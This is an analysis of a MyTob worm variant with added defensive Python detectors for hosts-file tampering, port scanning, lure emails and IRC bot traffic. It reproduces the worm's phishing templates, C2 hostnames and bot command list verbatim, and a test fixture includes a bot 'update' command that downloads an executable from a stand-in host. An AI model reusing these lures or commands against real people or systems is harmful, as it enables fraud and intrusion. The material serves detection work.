Aliases: Backdoor.Win32.Aimbot.bf [KAV], W32.Mytob@mm [Norton], W32/Mytob-FV [Sophos], W32/MyTob.HD-mm, W32/Mytob.hd@MM [McAfee], W32/MyTob.PM@mm, W32/Mytob.PM@mm [Fprot], Worm.Mytob.KC [ClamAV], WORM_MYTOB.NC [Trend]
Detailed Analysis
All MyTob viruses have these characteristics:
- copy themselves to the local system
- search files for email addresses
- send themselves by SMTP using a self-contained mail engine
Some variants have these additional characteristics:
- connect to an IRC server to receive instructions or await commands from a malicious user
- prevent the infected system from reaching update servers and various other security-related web sites; this is done by modifying the local "hosts" file and adding entries that map those sites' domain names to the local host
- try to connect to random IP addresses to infect systems using an RPC DCOM / LSASS exploit combo
The variants differ slightly in packed file size and in the file names created on the host, but the functionality of the viruses remains the same.
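The hosts-file tampering described above leaves a simple artefact to check for: a non-local name mapped to a loopback or null address, or a security vendor's domain mapped anywhere at all. The following is an added example written for this page, not code from the original analysis; the vendor watchlist, the sample hosts-file content and the "sink" address ranges are constructed assumptions, not the worm's actual list.

```python
"""Flag hosts-file entries that redirect security or update domains.

Added example (not from the original analysis). Reads hosts-file text,
ignores comments and the legitimate localhost entries, and reports:
  - a watchlisted security/update domain mapped to a loopback/null
    address (the MyTob technique described above),
  - any other non-local name mapped to loopback (generic sinkholing),
  - a watchlisted domain mapped to some other address (redirection).
WATCHLIST, SINK_ADDRS and SAMPLE_HOSTS are constructed for illustration.
"""
import ipaddress
import re

# Assumed watchlist of update/AV domains; illustrative, not the worm's list.
WATCHLIST = (
    "windowsupdate.microsoft.com",
    "update.microsoft.com",
    "symantec.com",
    "mcafee.com",
    "sophos.com",
    "trendmicro.com",
    "kaspersky.com",
)

# Names that legitimately map to loopback and must not be flagged.
LEGIT_LOCAL = {"localhost", "localhost.localdomain", "ip6-localhost"}

# Addresses a hosts-file entry uses to make a name unreachable.
SINK_ADDRS = ("127.0.0.0/8", "0.0.0.0/32", "::1/128")


def parse_hosts(text):
    """Yield (ip_address, hostname) pairs; comments and junk are skipped."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        fields = re.split(r"\s+", line)
        ip, names = fields[0], fields[1:]
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue  # not a resolvable entry
        for name in names:
            yield addr, name.lower()


def _is_sink(addr):
    return any(addr in ipaddress.ip_network(n) for n in SINK_ADDRS)


def _on_watchlist(name):
    return any(name == d or name.endswith("." + d) for d in WATCHLIST)


def suspicious_entries(text):
    """Return [(ip, hostname, reason)] for every entry worth a look."""
    findings = []
    for addr, name in parse_hosts(text):
        if name in LEGIT_LOCAL:
            continue
        if _is_sink(addr) and _on_watchlist(name):
            findings.append((str(addr), name, "security domain sinkholed"))
        elif _is_sink(addr):
            findings.append((str(addr), name, "non-local name mapped to loopback"))
        elif _on_watchlist(name):
            findings.append((str(addr), name, "security domain redirected"))
    return findings


# Constructed sample: a clean header, then the kind of lines the worm adds.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
127.0.0.1       windowsupdate.microsoft.com
127.0.0.1       liveupdate.symantec.com   # added by malware
0.0.0.0         download.mcafee.com
192.168.1.10    intranet.example.test
10.0.0.5        www.sophos.com
"""

if __name__ == "__main__":
    for ip, host, why in suspicious_entries(SAMPLE_HOSTS):
        print(f"{ip:<15} {host:<32} {why}")
```

Run it against the contents of %SystemRoot%\System32\drivers\etc\hosts on a suspect machine; the "non-local name mapped to loopback" rule catches variants whose blocked-domain list differs from the watchlist.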
Specific Properties
This variant of MyTob includes backdoor components and exploits for numerous vulnerabilities, in an effort to maximize its spread. It propagates by three significant means:
- SMTP email as an attachment
- Network shares
- Vulnerabilities and exploits
The third method uses these attack vectors:

  Type                                   MS Bulletin   Port(s)
  -------------------------------------  -----------   --------------------
  WebDAV                                 MS03-007      80
  NetBIOS / network shares               -             139
  Windows NT password dictionary attack  -             445
  RPC DCOM (1 and 2)                     MS03-039      135, 139, 445
  MS SQL exploit                         MS02-039      1433, 1434
  LSASS exploit                          MS04-011      135, 139, 445
  Plug and Play (PnP) exploit            MS05-039      135, 139, 445, 1025
  Workstation Service exploit            MS03-049      135, 139, 445
  ASN.1 SMB exploit                      MS04-007      135, 139, 445
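The port list above is also what the scanning looks like from the network: one internal host opening connections on 135/139/445/1433/1434 to many unrelated addresses in a short time. The following is an added example written for this page, not code from the original analysis. The log record format, the sample lines, the sliding window and the alert threshold are all assumptions made for illustration.

```python
"""Spot worm-style scanning from connection logs.

Added example, not part of the original analysis. A source that reaches
many distinct hosts on the ports from the propagation table within one
sliding window is reported, together with the ports it used. The record
format, the sample log, WINDOW_SECONDS and DISTINCT_TARGETS are assumed;
adapt parse_line() to the flow or firewall log you actually have.
"""
from collections import defaultdict

# Ports from the propagation table, with what each one carries there.
WORM_PORTS = {
    80: "WebDAV (MS03-007)",
    135: "RPC: DCOM, LSASS, Workstation, ASN.1, PnP",
    139: "NetBIOS / network shares",
    445: "SMB: share access, NT password guessing, RPC over SMB",
    1025: "RPC endpoint used by the PnP exploit",
    1433: "MS SQL",
    1434: "MS SQL resolution service (MS02-039)",
}

WINDOW_SECONDS = 60      # assumed sliding window
DISTINCT_TARGETS = 8     # assumed: distinct hosts per window before alerting


def parse_line(line):
    """Assumed record format: '<epoch> <src_ip> <dst_ip> <dst_port>'."""
    ts, src, dst, port = line.split()
    return int(ts), src, dst, int(port)


def detect_scanners(lines, window=WINDOW_SECONDS, threshold=DISTINCT_TARGETS):
    """Return {src: (window_start, distinct_targets, sorted_ports)} for each
    source that reached >= threshold distinct hosts on worm ports inside one
    sliding window; the widest qualifying window per source is reported."""
    per_src = defaultdict(list)
    for line in lines:
        ts, src, dst, port = parse_line(line)
        if port in WORM_PORTS:
            per_src[src].append((ts, dst, port))

    alerts = {}
    for src, events in per_src.items():
        events.sort()
        best = None
        lo = 0
        for hi in range(len(events)):
            while events[hi][0] - events[lo][0] > window:
                lo += 1
            span = events[lo:hi + 1]
            targets = {dst for _, dst, _ in span}
            if len(targets) >= threshold and (best is None or len(targets) > best[1]):
                best = (events[lo][0], len(targets),
                        sorted({port for _, _, port in span}))
        if best:
            alerts[src] = best
    return alerts


# Constructed sample: one scanner, one busy-but-normal client, one browser.
SCAN_PORTS = [445, 135, 445, 1434, 139, 445, 135, 445, 445, 1025]
SAMPLE_LOG = (
    [f"{1000 + i * 2} 10.0.0.7 203.0.113.{i + 1} {p}"
     for i, p in enumerate(SCAN_PORTS)]
    + [f"{1000 + i * 3} 10.0.0.9 10.0.0.50 445" for i in range(15)]
    + ["1005 10.0.0.3 198.51.100.1 80",
       "1010 10.0.0.3 198.51.100.2 80",
       "1020 10.0.0.3 198.51.100.3 443"]
)

if __name__ == "__main__":
    for src, (start, n, ports) in detect_scanners(SAMPLE_LOG).items():
        names = ", ".join(f"{p} ({WORM_PORTS[p]})" for p in ports)
        print(f"{src}: {n} distinct targets from t={start} on ports {names}")
```

Counting distinct destinations rather than connections is what separates the scanner (10.0.0.7) from a workstation hammering one file server (10.0.0.9); port 80 is included because of the WebDAV vector, so the threshold has to stay high enough that ordinary browsing does not trip it.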
- writes the file "SQLSRV.exe" to the System32 folder and registers it to run at Windows logon
- modifies the registry so that the virus is allowed to run and is not blocked by the built-in Windows XP firewall
- connects to the IRC server 'irc.blackcarder.net' to receive instructions from a malicious user
- sends emails with one of these subject lines -
Your password has been updated
Your password has been successfully updated
You have successfully updated your password
Your new account password is approved
Your Account is Suspended
*DETECTED* Online User Violation
Your Account is Suspended For Security Reasons
Warning Message: Your services near to be closed.
Important Notification
Members Support
Security measures
Email Account Suspension
Notice of account limitation
- sends emails with one of four HTML-format body texts, where %s is a portion of the recipient's email address: in the first occurrence it is the local part (the prefix before the @) and in the remaining occurrences it is the domain. The four templates follow, reproduced verbatim (misspellings included) -
Dear user %s,
You have successfully updated the password
of your %s account.
If you did not authorize this change or if
you need assistance with your account, please
contact %s customer service at: %s
Thank you for using %s!
The %s Support Team
+++ Attachment: No Virus (Clean)
+++ %s Antivirus - www.%s
Dear user %s,
It has come to our attention that your %s
User Profile ( x ) records are out of date.
For further details see the attached document.
Thank you for using %s!
The %s Support Team
+++ Attachment: No Virus (Clean)
+++ %s Antivirus - www.%s
Dear %s Member,
We have temporarily suspended your email account
%s.
This might be due to either of the following
reasons:
1. A recent change in your personal information
(i.e. change of address).
2. Submiting invalid information during the
initial sign up process.
3. An innability to accurately verify your
selected option of subscription due to an
internal error within our processors.
See the details to reactivate your %s account.
Sincerely,The %s Support Team
+++ Attachment: No Virus (Clean)
+++ %s Antivirus - www.%s
Dear %s Member,
Your e-mail account was used to send a huge
amount of unsolicited spam messages during
the recent week. If you could please take
5-10 minutes out of your online experience
and confirm the attached document so you will
not run into any future problems with the
online service.
If you choose to ignore our request, you leave
us no choice but to cancel your membership.
Virtually yours,
The %s Support Team
+++ Attachment: No Virus found
+++ %s Antivirus - www.%s
- spoofs the sender address so that its local part (the name before the @) is one of these -
support
administrator
mail
service
admin
info
register
webmaster
- the attached file is a .ZIP archive with one of
these names -
updated-password
email-password
new-password
password
approved-password
account-password
accepted-password
important-details
account-details
email-details
account-info
document
readme
account-report
- connects to the IRC server 'whitman.majesticwin.com' and joins the channel "whitman2" to await instructions and commands from a malicious user
- supports the following commands over the IRC connection (many entries are short aliases of the command before them, e.g. sec for secure, lsa for lsascan, pnp for pnpscan) -
  login, threads, sub, kill, logout, who, remove, bye, testdlls, cel, uptime,
  installed, version, status, secure, sec, unsecure, unsec, process, list, kill,
  status, hide, create, nickupdate, randnick, rand, exploitftpd, eftpd, socks4,
  redirect, netstatp, nsp, iestart, ies, encrypt, enc, join, part, raw, prefix,
  resolve, dns, currentip, cip, stats, banner, ban, advscan, asc, scanall,
  lsascan, lsa, ntscan, nts, wksescan, wkse, wksoscan, wkso, pnpscan, pnp,
  flusharp, farp, flushdns, fdns, pstore, pst, sysinfo, netinfo, driveinfo,
  total, mirccmd, mirc, system, sys, file, type, cat, exists, del, rmdir, move,
  copy, attrib, open, down, wget, update, upd, else, nick, host, uptime,
  recordup, rup, private
- terminates threads and applications matching a
built-in file name dictionary of common security
and antivirus apps
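The mail lure is fully described above: a fixed subject, a spoofed sender with an administrative local part, a .ZIP attachment from a short list of names, and a body that ends with a fake "No Virus" scan trailer and a "%s Support Team" sign-off. The following is an added example written for this page, not code from the original analysis: it parses a message with the Python standard library and reports which of those indicators matched, so a gateway can alert on the combination rather than on a single string. The two sample messages and the three-indicator alert threshold are constructed assumptions.

```python
"""Score an e-mail against the MyTob lure described above.

Added example; not from the original analysis. The indicator lists are
the subject lines, sender prefixes and attachment names given in
Specific Properties; the body checks look for the "+++ Attachment: No
Virus" trailer and the "The <domain> Support Team" sign-off that all
four templates share. LURE, BENIGN and min_hits are constructed.
"""
import email
import email.policy
import email.utils
import os
import re

SUBJECTS = {
    "your password has been updated",
    "your password has been successfully updated",
    "you have successfully updated your password",
    "your new account password is approved",
    "your account is suspended",
    "*detected* online user violation",
    "your account is suspended for security reasons",
    "warning message: your services near to be closed.",
    "important notification", "members support", "security measures",
    "email account suspension", "notice of account limitation",
}
SENDER_PREFIXES = {"support", "administrator", "mail", "service",
                   "admin", "info", "register", "webmaster"}
ATTACHMENT_STEMS = {
    "updated-password", "email-password", "new-password", "password",
    "approved-password", "account-password", "accepted-password",
    "important-details", "account-details", "email-details",
    "account-info", "document", "readme", "account-report",
}
SIGNOFF = re.compile(r"\bthe \S+ support team\b")  # "The %s Support Team"


def analyse(raw):
    """Return the list of lure indicators present in one RFC 822 message."""
    msg = email.message_from_string(raw, policy=email.policy.default)
    hits = []

    subject = (msg["subject"] or "").strip().lower()
    if subject in SUBJECTS:
        hits.append("subject")

    local_part = email.utils.parseaddr(msg["from"] or "")[1].split("@")[0].lower()
    if local_part in SENDER_PREFIXES:
        hits.append("sender-prefix")

    for part in msg.walk():
        name = part.get_filename()
        if name:
            stem, ext = os.path.splitext(name.lower())
            if ext == ".zip" and stem in ATTACHMENT_STEMS:
                hits.append("zip-attachment")

    body = msg.get_body(preferencelist=("html", "plain"))
    text = body.get_content().lower() if body is not None else ""
    if "+++ attachment: no virus" in text:
        hits.append("av-trailer")
    if SIGNOFF.search(text):
        hits.append("support-team-signoff")
    return hits


def is_mytob_lure(raw, min_hits=3):
    """Assumed policy: three or more indicators together make a lure."""
    return len(analyse(raw)) >= min_hits


# Constructed sample lure, filled in the way the template describes.
LURE = """\
From: support@example.com
To: jdoe@example.com
Subject: Your Account is Suspended
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="us-ascii"

<html><body>Dear example.com Member,<br>
We have temporarily suspended your email account jdoe@example.com.<br>
See the details to reactivate your example.com account.<br>
Sincerely,The example.com Support Team<br>
+++ Attachment: No Virus (Clean)<br>
+++ example.com Antivirus - www.example.com</body></html>
--b1
Content-Type: application/zip; name="account-details.zip"
Content-Disposition: attachment; filename="account-details.zip"
Content-Transfer-Encoding: base64

UEsFBgAAAAAAAAAAAAAAAAAAAAAAAA==
--b1--
"""

# Constructed benign message for comparison.
BENIGN = """\
From: alice@example.com
To: jdoe@example.com
Subject: Lunch on Thursday?
Content-Type: text/plain; charset="us-ascii"

Are you free Thursday? The team is trying the new place on Main St.
"""

if __name__ == "__main__":
    for label, raw in (("lure", LURE), ("benign", BENIGN)):
        print(label, analyse(raw), "->", is_mytob_lure(raw))
```

Scoring on the combination matters because several of the subjects ("Important Notification", "Members Support") and sender names ("info", "support") are common in legitimate mail; a .ZIP whose name is on the list plus the fake scan trailer is what makes the match specific.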
Miscellaneous
The file has an icon that resembles an installation or setup package. The file's version properties read "Microsoft Service Pack 2 Moniter".
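The IRC command set listed under Specific Properties is also usable for network detection: the bot joins a named channel and then takes commands as PRIVMSG text whose first word is one of those names. The following is an added example written for this page, not code from the original analysis. It parses the IRC wire format (optional :prefix, command, parameters, :trailing) and flags JOINs to the channel named above and PRIVMSG lines that carry a bot command. The session lines, the prefix characters the operator might use, and the list of command words treated as too common to flag without a prefix are all constructed assumptions.

```python
"""Pick bot command-and-control out of an IRC session log.

Added example, not part of the original analysis. BOT_COMMANDS is the
command list from Specific Properties; WATCH_CHANNELS is the channel
named there. PREFIX_CHARS, AMBIGUOUS and SESSION are assumptions made
for illustration.
"""
import re

BOT_COMMANDS = {
    "login", "threads", "sub", "kill", "logout", "who", "remove", "bye",
    "testdlls", "cel", "uptime", "installed", "version", "status", "secure",
    "sec", "unsecure", "unsec", "process", "list", "hide", "create",
    "nickupdate", "randnick", "rand", "exploitftpd", "eftpd", "socks4",
    "redirect", "netstatp", "nsp", "iestart", "ies", "encrypt", "enc", "join",
    "part", "raw", "prefix", "resolve", "dns", "currentip", "cip", "stats",
    "banner", "ban", "advscan", "asc", "scanall", "lsascan", "lsa", "ntscan",
    "nts", "wksescan", "wkse", "wksoscan", "wkso", "pnpscan", "pnp", "flusharp",
    "farp", "flushdns", "fdns", "pstore", "pst", "sysinfo", "netinfo",
    "driveinfo", "total", "mirccmd", "mirc", "system", "sys", "file", "type",
    "cat", "exists", "del", "rmdir", "move", "copy", "attrib", "open", "down",
    "wget", "update", "upd", "else", "nick", "host", "recordup", "rup", "private",
}
# Assumed: everyday words from the set that would fire on human chat, so they
# are only flagged when the text starts with a bot prefix character.
AMBIGUOUS = {
    "join", "part", "list", "type", "open", "move", "copy", "host", "total",
    "else", "file", "status", "who", "bye", "private", "nick", "version",
    "uptime", "stats", "system", "kill", "create", "hide", "raw", "exists",
    "del", "cat", "down", "process", "banner", "ban", "secure", "resolve",
    "update", "remove", "login", "logout", "prefix",
}
WATCH_CHANNELS = {"#whitman2"}
PREFIX_CHARS = ".!$"   # assumed command-prefix characters

IRC_LINE = re.compile(r"^(?::(?P<prefix>\S+) )?(?P<cmd>\S+)(?: (?P<params>.*))?$")


def parse_irc(line):
    """Return (prefix, COMMAND, [params...]) for one raw IRC line, else None."""
    m = IRC_LINE.match(line.rstrip("\r\n"))
    if not m:
        return None
    rest = m.group("params") or ""
    if rest.startswith(":"):
        params = [rest[1:]]
    elif " :" in rest:
        head, trailing = rest.split(" :", 1)
        params = head.split() + [trailing]
    else:
        params = rest.split()
    return m.group("prefix"), m.group("cmd").upper(), params


def flag_line(line):
    """Return a reason string if the line looks like bot C2, else None."""
    parsed = parse_irc(line)
    if not parsed:
        return None
    _prefix, cmd, params = parsed
    if cmd == "JOIN" and params and params[0].lower() in WATCH_CHANNELS:
        return f"join to C2 channel {params[0]}"
    if cmd == "PRIVMSG" and len(params) >= 2:
        text = params[-1].strip()
        if not text:
            return None
        has_prefix = text[0] in PREFIX_CHARS
        words = (text[1:] if has_prefix else text).split()
        if words:
            word = words[0].lower()
            if word in BOT_COMMANDS and (has_prefix or word not in AMBIGUOUS):
                return f"bot command '{word}' in {params[0]}"
    return None


def scan_session(lines):
    """Return [(line_no, reason)] for every flagged line of a session log."""
    out = []
    for n, line in enumerate(lines, 1):
        reason = flag_line(line)
        if reason:
            out.append((n, reason))
    return out


# Constructed session: a bot joining, an operator issuing commands, and
# ordinary chat that must not fire.
SESSION = [
    ":irc.example.test 001 xkqzp :Welcome",
    ":xkqzp!sqlsrv@10.0.0.7 JOIN :#whitman2",
    ":ops!op@203.0.113.9 PRIVMSG #whitman2 :.advscan lsass 100 5 0 -r -s",
    ":ops!op@203.0.113.9 PRIVMSG #whitman2 :.update http://203.0.113.9/x.exe sqlsrv",
    ":ops!op@203.0.113.9 PRIVMSG xkqzp :sysinfo",
    ":bob!bob@198.51.100.4 PRIVMSG #chat :can you join us for lunch",
    ":bob!bob@198.51.100.4 PRIVMSG #chat :list of things to do",
    "PING :irc.example.test",
]

if __name__ == "__main__":
    for n, reason in scan_session(SESSION):
        print(f"line {n}: {reason}")
```

The split between prefixed and unprefixed commands is the practical knob: words such as "join", "list" or "open" are ordinary chat unless they follow the operator's prefix character, while "advscan", "lsascan" or "sysinfo" are specific enough to flag on their own.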